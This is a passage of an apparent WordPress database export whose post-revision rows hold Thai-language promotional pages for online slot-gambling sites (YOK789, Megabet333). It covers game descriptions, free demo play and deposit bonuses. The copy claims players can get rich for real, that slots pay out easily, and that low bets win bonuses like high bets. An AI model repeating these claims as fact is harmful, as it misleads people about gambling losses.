<b>ปั่น สล็อต 1 บาท</b> แล้วได้ฟีลคุ้มค่า มีสล็อตหลายแนวที่ออกแบบมาให้เล่นง่ายและลุ้นสนุก เกมธีมสมบัติหรือแนวผจญภัยมักมีรอบโบนัสสุ่มแตกไว เหมาะกับสายค่อย ๆ เก็บกำไร ส่วนแนวผลไม้คลาสสิกให้จังหวะเข้าใจง่าย หมุนเพลินไม่ซับซ้อน ทำให้มือใหม่จับทางได้เร็ว ความดีคือแม้ตั้งเบทต่ำก็ยังมีโอกาสเข้าโหมดพิเศษและฟรีสปินเหมือนเบทสูง ทุกการหมุนจึงไม่เสียเปล่า อยู่ที่การบริหารทุนและเลือกเกมให้ตรงสไตล์ ใครชอบลุ้นรัวหรือชอบค่อย ๆ ไต่ยอดก็เลือกได้ตามจังหวะตัวเอง เปิดประสบการณ์ปั่นแบบเบทเบาแต่ลุ้นหนักได้ครบในที่เดียว</p><h3><b>เกมสล็อต Mahjong Ways</b></h3><p>Mahjong Ways คือสล็อตธีมไพ่นกกระจอกที่มาแรงแบบไม่มีตกกระแส จุดเด่นอยู่ที่ระบบชนะต่อเนื่องที่ทำให้ทุกการเรียงสัญลักษณ์มีสิทธิ์ไหลยาวแบบคอมโบ ภาพกราฟิกสไตล์จีนโบราณดูแพงแต่เล่นง่าย จังหวะเกมไม่เร็วเกินไปจึงเหมาะกับสายวางแผนที่ชอบดูทรงก่อนเร่งรอบ ความเฟี้ยวของเกมนี้คือฟีเจอร์ตัวคูณที่เพิ่มขึ้นเรื่อย ๆ เมื่อชนะติดกัน ทำให้กำไรพุ่งแบบไม่ทันตั้งตัว ใครชอบฟีลค่อย ๆ สะสมความได้เปรียบแล้วปิดจบด้วยรอบโบนัสหนัก ๆ จะอินกับเกมนี้สุดทาง เล่นเพลินแต่มีชั้นเชิง ทำให้ทุกการหมุนไม่ใช่แค่ลุ้นโชคแต่คือการอ่านจังหวะและเลือกสปีดให้เข้ากับสไตล์ตัวเอง</p><h3><b>เกมสล็อต Treasures of Azte</b></h3><p>Treasures of Aztec มาในธีมอารยธรรมลึกลับที่เต็มไปด้วยสีทองและพลังแห่งขุมทรัพย์ จุดขายคือรูปแบบเกมเรียบง่ายแต่ซ่อนโอกาสแตกหนักไว้ทุกตา สัญลักษณ์มูลค่าสูงมีบทบาทชัดเจน ทำให้สายลุ้นแจ็กพอตรู้สึกหัวใจเต้นแรงทุกครั้งที่วงล้อหยุด ความสนุกอยู่ที่การเข้าใจจังหวะของเกม เพราะบางรอบอาจนิ่งแต่พอเข้าโหมดโบนัสแล้วสามารถพุ่งยาวได้แบบสะใจ เหมาะกับคนที่ชอบความตื่นเต้นสไตล์รวดเร็วไม่ต้องคิดซับซ้อน ภาพสวยคมชัด เอฟเฟกต์จัดเต็ม ช่วยเพิ่มอารมณ์ร่วมทุกครั้งที่ชนะ ทำให้การปั่นแต่ละรอบมีเสน่ห์เฉพาะตัวและสร้างความรู้สึกอยากกดต่อแบบไม่ต้องฝืนใจ</p><h3><b>เกมสล็อต Dragon Hatc</b></h3><p>Dragon Hatch คือสล็อตสายแฟนตาซีที่หยิบเรื่องราวไข่มังกรมาเติมความมันแบบจัดเต็ม จุดเด่นคือระบบจ่ายรางวัลที่เปิดทางให้ลุ้นรัวในช่วงฟรีสปิน สัญลักษณ์ไข่มังกรแต่ละใบมีมูลค่าแตกต่างกัน ทำให้ทุกการหมุนเต็มไปด้วยความคาดหวัง ความเท่ของเกมนี้คือเอฟเฟกต์ไฟและเสียงคำรามที่ปลุกอารมณ์นักล่าให้ตื่นตัวตลอดเวลา ใครชอบเกมที่มีจังหวะพีคชัดเจนและมีโอกาสพลิกเกมในรอบเดียวจะถูกใจแน่นอน เล่นง่ายไม่ซับซ้อนแต่ให้ฟีลเหมือนกำลังผจญภัยในดินแดนมังกร ทุกครั้งที่เข้าสู่โหมดพิเศษคือช่วงเวลาที่ลุ้นหนักและมีสิทธิ์เห็นยอดพุ่งแบบเกินคาด เป็นอีกเกมที่ตอบโจทย์สายปั่นยุคใหม่ที่อยากได้ทั้งความมันและโอกาสทำกำไรในรอบเดียว</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>ปั่น สล็อต ฟรี ทดลอง รวยได้จริง เล่นฟรี YOK789 ได้ทุกค่ายไม่จำกัด </h2> <p>สายอยากลองก่อนลุยจริงต้องถูกใจโหมด <b>ปั่น สล็อต ฟรี</b> ที่เปิดให้ทดลองเล่นได้แบบไม่จำกัดค่าย ไม่ต้องเติมก็เข้าไปสัมผัสระบบเกมได้ครบทุกฟีเจอร์ จะลองจับจังหวะแตก ดูรอบโบนัสหรือเทสสไตล์เกมไหนเหมาะกับตัวเองก็ทำได้เต็มที่ ความดีงามคือให้ประสบการณ์เหมือนเล่นเงินจริง ภาพลื่น เอฟเฟกต์ครบ ทำให้วางแผนก่อนลงสนามจริงได้แบบมือโปร ใครอยากฝึกอ่านเกมหรือหาสูตรปั่นที่เข้ามือสามารถใช้โหมดนี้ปั้นความมั่นใจได้สบาย เมื่อพร้อมค่อยสลับมาเล่นจริงก็เดินเกมได้เฉียบกว่าเดิม เป็นพื้นที่ให้ทั้งมือใหม่และสายเก๋าได้พัฒนาจังหวะตัวเองโดยไม่ต้องเสี่ยงทุนตั้งแต่รอบแรก เปิดทางสู่โอกาสรวยด้วยการเริ่มจากศูนย์แบบมีชั้นเชิง</p>','HOME','','inherit','closed','closed','','44-revision-v1','','','2026-02-24 05:31:35','2026-02-24 05:31:35','',44,'https://yok789ss.com/?p=301',0,'revision','',0),(304,3,'2026-02-24 05:42:05','2026-02-24 05:42:05','<img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <a href=\"https://megabetauto.com/\" target=\"_blank\">\n ทดลองเล่นสล็อตฟรี คลิก!\n </a>\n <a href=\"https://amb18b.com/promotion/\" target=\"_blank\">\n โปรโมชั่นเกมสล็อต\n </a>\n <h1>ทดลองเล่นสล็อต รวมทุกค่ายเกมสล็อตแตกง่าย\n เว็บใหม่มาแรง API แท้ จาก USA</h1> <p data-start=\"354\" data-end=\"699\">การทดลองเล่นสล็อต megabet กำลังกลายเป็นเทรนด์ยอดฮิตในวงการเกมพนันออนไลน์ เพราะเป็นทางเลือกที่ดีที่สุดสำหรับผู้เล่นที่อยากสัมผัสความสนุกของเกมสล็อตแบบไม่ต้องเสียเงิน ทดลองเล่นสล็อตpgฟรี คือระบบที่เปิดให้คุณเข้าเล่นเกมได้ฟรีทุกค่าย ทุกเกม โดยไม่ต้องสมัครหรือฝากเงินก่อน เหมาะสำหรับมือใหม่ที่อยากฝึกฝีมือ รวมถึงสายปั่นสล็อตที่อยากลองสูตรใหม่ ๆ ก่อนลงสนามจริง เว็บสล็อตยุคใหม่อย่างเว็บตรง API แท้จาก USA กำลังมาแรงที่สุดในตอนนี้ เพราะมีระบบที่ทันสมัย ปลอดภัย และเชื่อมต่อกับผู้ให้บริการค่ายเกมโดยตรง ทำให้ผู้เล่นได้สัมผัสประสบการณ์เหมือนเล่นสล็อตในคาสิโนต่างประเทศแท้ ๆ ไม่ว่าจะเป็นภาพ เสียง หรืออัตราการแตกของโบนัส ทุกอย่างสมจริงและได้มาตรฐานระดับโลก ใครที่ยังไม่เคยลองถือว่าพลาดมาก เพราะนี่คือโอกาสทองในการเรียนรู้ระบบสล็อตก่อนลงเดิมพันจริง</p> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz.webp 651w, https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz.webp 651w, https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" />','ทดลองเล่นสล็อต','','inherit','closed','closed','','16-revision-v1','','','2026-02-24 05:42:05','2026-02-24 05:42:05','',16,'https://yok789ss.com/?p=304',0,'revision','',0),(305,3,'2026-02-24 05:42:05','2026-02-24 05:42:05','<img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <a href=\"https://megabetauto.com/\" target=\"_blank\">\n ทดลองเล่นสล็อตฟรี คลิก!\n </a>\n <a href=\"https://amb18b.com/promotion/\" target=\"_blank\">\n โปรโมชั่นเกมสล็อต\n </a>\n <h1>ทดลองเล่นสล็อต รวมทุกค่ายเกมสล็อตแตกง่าย\n เว็บใหม่มาแรง API แท้ จาก USA</h1> <p data-start=\"354\" data-end=\"699\">การทดลองเล่นสล็อต megabet กำลังกลายเป็นเทรนด์ยอดฮิตในวงการเกมพนันออนไลน์ เพราะเป็นทางเลือกที่ดีที่สุดสำหรับผู้เล่นที่อยากสัมผัสความสนุกของเกมสล็อตแบบไม่ต้องเสียเงิน ทดลองเล่นสล็อตpgฟรี คือระบบที่เปิดให้คุณเข้าเล่นเกมได้ฟรีทุกค่าย ทุกเกม โดยไม่ต้องสมัครหรือฝากเงินก่อน เหมาะสำหรับมือใหม่ที่อยากฝึกฝีมือ รวมถึงสายปั่นสล็อตที่อยากลองสูตรใหม่ ๆ ก่อนลงสนามจริง เว็บสล็อตยุคใหม่อย่างเว็บตรง API แท้จาก USA กำลังมาแรงที่สุดในตอนนี้ เพราะมีระบบที่ทันสมัย ปลอดภัย และเชื่อมต่อกับผู้ให้บริการค่ายเกมโดยตรง ทำให้ผู้เล่นได้สัมผัสประสบการณ์เหมือนเล่นสล็อตในคาสิโนต่างประเทศแท้ ๆ ไม่ว่าจะเป็นภาพ เสียง หรืออัตราการแตกของโบนัส ทุกอย่างสมจริงและได้มาตรฐานระดับโลก ใครที่ยังไม่เคยลองถือว่าพลาดมาก เพราะนี่คือโอกาสทองในการเรียนรู้ระบบสล็อตก่อนลงเดิมพันจริง</p> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz.webp 651w, https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz.webp 651w, https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" />','ทดลองเล่นสล็อต','','inherit','closed','closed','','16-revision-v1','','','2026-02-24 05:42:05','2026-02-24 05:42:05','',16,'https://yok789ss.com/?p=305',0,'revision','',0),(306,3,'2026-02-24 05:42:05','2026-02-24 05:42:05','<img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Demo-play-slot-Banner-Yok789.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Demo-play-slot-Banner-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Demo-play-slot-Banner-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Demo-play-slot-Banner-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Demo-play-slot-Banner-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <a href=\"https://megabetauto.com/\" target=\"_blank\">\n ทดลองเล่นสล็อตฟรี คลิก!\n </a>\n <a href=\"https://amb18b.com/promotion/\" target=\"_blank\">\n โปรโมชั่นเกมสล็อต\n </a>\n <h1>ทดลองเล่นสล็อต YOK789 เว็บสล็อตเว็บตรงอันดับ 1 รวมเกมแตกไว </h1> <p data-pm-slice=\"0 0 []\">ทางเข้าเล่น YOK789 คือแพลตฟอร์มสล็อตออนไลน์ที่ได้รับความนิยมอย่างรวดเร็ว ด้วยระบบเว็บตรงไม่ผ่านเอเย่นต์ และใช้ API แท้จาก USA ทำให้เกมมีความเสถียร ภาพสวย และแตกไว ถูกใจสายสล็อตรุ่นใหม่ รวมเกมฮิตหลากหลายค่าย อัปเดตใหม่ตลอดเวลา รองรับการใช้งานผ่านมือถือและคอมพิวเตอร์ สมัครยูสใหม่รับโบนัสฟรีทุกวัน พร้อมโปรโมชั่นหมุนฟรี และเครดิตคืนยอดเสีย เหมาะสำหรับผู้เล่นที่มองหาประสบการณ์สนุก ตื่นเต้น พร้อมระบบฝากถอนรวดเร็ว อย่างไรก็ตาม ควรเล่นอย่างมีสติ และสำหรับผู้ที่มีอายุ 18 ปีขึ้นไปเท่านั้น เพื่อความบันเทิง และความรับผิดชอบต่อการเงินของตนเอง</p> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/PG.webp\" alt=\"PG\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/PG.webp 651w, https://amb18b.com/wp-content/uploads/2026/02/PG-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Microgaming.webp\" alt=\"Microgaming\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Microgaming.webp 314w, https://amb18b.com/wp-content/uploads/2026/02/Microgaming-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/JILI.webp\" alt=\"JILI\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/JILI.webp 314w, https://amb18b.com/wp-content/uploads/2026/02/JILI-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/JOKER.webp\" alt=\"JOKER\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/JOKER.webp 314w, https://amb18b.com/wp-content/uploads/2026/02/JOKER-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-xo.webp\" alt=\"Slot xo\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-xo.webp 314w, https://amb18b.com/wp-content/uploads/2026/02/Slot-xo-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/pragmatic.webp\" alt=\"pragmatic\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/pragmatic.webp 651w, https://amb18b.com/wp-content/uploads/2026/02/pragmatic-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" />','ทดลองเล่นสล็อต','','inherit','closed','closed','','16-revision-v1','','','2026-02-24 05:42:05','2026-02-24 05:42:05','',16,'https://yok789ss.com/?p=306',0,'revision','',0),(308,3,'2026-02-24 05:49:09','2026-02-24 05:49:09','<h1>โปรโมชั่น Megabet333 รวมโปรสล็อต โบนัสฟรี 100% ถอนไม่อั้น</h1> <p data-start=\"346\" data-end=\"760\">ถ้าพูดถึงสิ่งที่ดึงดูดผู้เล่นให้เข้ามาเล่นสล็อตออนไลน์ megabet มากที่สุดก็คงหนีไม่พ้น “<strong>โปรโมชั่นสล็อต</strong>” เพราะเป็นตัวช่วยสำคัญที่ทำให้ผู้เล่นได้ทั้งความคุ้มค่าและความสนุกไปพร้อมกัน เว็บพนันออนไลน์ยุคใหม่จึงแข่งขันกันออกโปรโมชั่นเด็ด ๆ เพื่อเอาใจนักเดิมพันทุกกลุ่ม ไม่ว่าจะเป็นมือใหม่หรือผู้เล่นประจำ ต่างก็สามารถรับสิทธิ์พิเศษได้เต็มที่ ยิ่งถ้าเลือกเว็บที่มีโปรหลากหลายและแจกจริง ยิ่งช่วยให้การเล่นสล็อตสนุกมากขึ้นกว่าที่เคย เว็บพนันออนไลน์ในปัจจุบันไม่เพียงแต่ให้บริการเกมสล็อตจากค่ายชั้นนำเท่านั้น แต่ยังมาพร้อมโปรโมชั่นสล็อตที่ครอบคลุมทุกช่วงเวลา ตั้งแต่สมัครสมาชิก ฝากเงิน ถอนเงิน ไปจนถึงโปรคืนยอดเสีย ซึ่งทั้งหมดนี้ถือเป็นโอกาสทองสำหรับผู้เล่นที่อยากเพิ่มทุนแบบไม่ต้องลงทุนเยอะ แถมยังช่วยให้ปั่นสล็อตได้ต่อเนื่องแบบไม่มีสะดุด</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/20_get_100_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/20_get_100_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/20_get_100_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/20_get_100_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/20_get_100_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>โปร 20 รับ 100</h2> <p style=\"text-align: center;\">ฝาก 20 → รับเพิ่ม 80 = รวม 100 / ทำเทิร์น 8 เท่า / ถอนได้สูงสุด 200</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น</strong> 8 เท่า ของยอดรวม</li><li>เฉพาะสล็อตเท่านั้น</li><li>ห้ามซื้อฟรีสปิน</li></ul> <a href=\"https://mgbline.com/\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/79_get_200_7turn_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/79_get_200_7turn_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/79_get_200_7turn_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/79_get_200_7turn_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/79_get_200_7turn_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>โปร 79 รับ 200</h2> <p style=\"text-align: center;\">ฝาก 79 → รับเพิ่ม 121 = รวม 200 / ทำเทิร์น 7 เท่า / ถอนได้สูงสุด 600</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น</strong> 7 เท่า ของยอดรวม</li><li data-start=\"798\" data-end=\"837\">เฉพาะสล็อตเท่านั้น</li><li data-start=\"798\" data-end=\"837\">ห้ามซื้อฟรีสปิน</li></ul> <a href=\"https://mgbline.com/\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Free_bonus_100_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Free_bonus_100_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Free_bonus_100_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Free_bonus_100_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Free_bonus_100_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>โปรรับโมบัส 100%</h2> <p style=\"text-align: center;\" data-start=\"696\" data-end=\"740\"><strong data-start=\"696\" data-end=\"711\">คุ้มสองเด้ง</strong> เติมเท่าไรรับเพิ่มเท่านั้น</p><ul><li data-start=\"696\" data-end=\"740\"><strong data-start=\"743\" data-end=\"758\">100 รับ 200</strong></li><li data-start=\"696\" data-end=\"740\"><strong data-start=\"763\" data-end=\"780\">500 รับ 1,000</strong></li></ul><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"798\" data-end=\"813\">ทำ 6 เทิร์น</strong>, <strong data-start=\"815\" data-end=\"835\">ถอนสูงสุด 3 เท่า</strong></li><li data-start=\"798\" data-end=\"837\">ก่อนถอน <strong data-start=\"848\" data-end=\"886\">ระบบตัดเครดิตโปรโมชั่น (ส่วนโบนัส)</strong> ออกโดยอัตโนมัติ เหลือยอดเงินจริงสำหรับถอน</li><li data-start=\"798\" data-end=\"837\">จำกัดสิทธิ์ <strong data-start=\"945\" data-end=\"967\">1 ครั้ง/วัน/ผู้ใช้</strong></li></ul> <a href=\"https://mgbline.com/\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/HBD_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/HBD_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/HBD_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/HBD_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/HBD_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>Happy Birthday Bonus </h2> <p style=\"text-align: center;\" data-start=\"1415\" data-end=\"1466\">🎁 ฉลองเดือนเกิด รับของขวัญตามยอดฝากสะสมภายในเดือนนั้น <br />(รับได้ตลอดทั้งเดือนเกิด)</p><ul><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1480\" data-end=\"1496\">3,000 